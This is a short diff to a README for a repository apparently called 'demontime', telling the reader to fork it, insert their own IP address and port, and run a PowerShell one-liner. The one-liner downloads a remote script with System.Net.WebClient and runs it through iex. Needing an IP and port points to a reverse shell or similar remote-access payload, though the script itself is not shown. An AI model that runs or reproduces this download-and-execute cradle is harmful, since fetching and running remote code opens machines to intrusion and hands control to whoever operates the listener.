sscoconutree/demontime/README.md

 **Optional**

-Fork this repo so you can run the following one liner:
+Fork this repo so you can run the following one liner with your own IP Address and Port number:
 **NOTE: Replace the URL with your own forked repo.**

 ```iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/xxxxxx/experiment/main/demontime.ps1');demontime```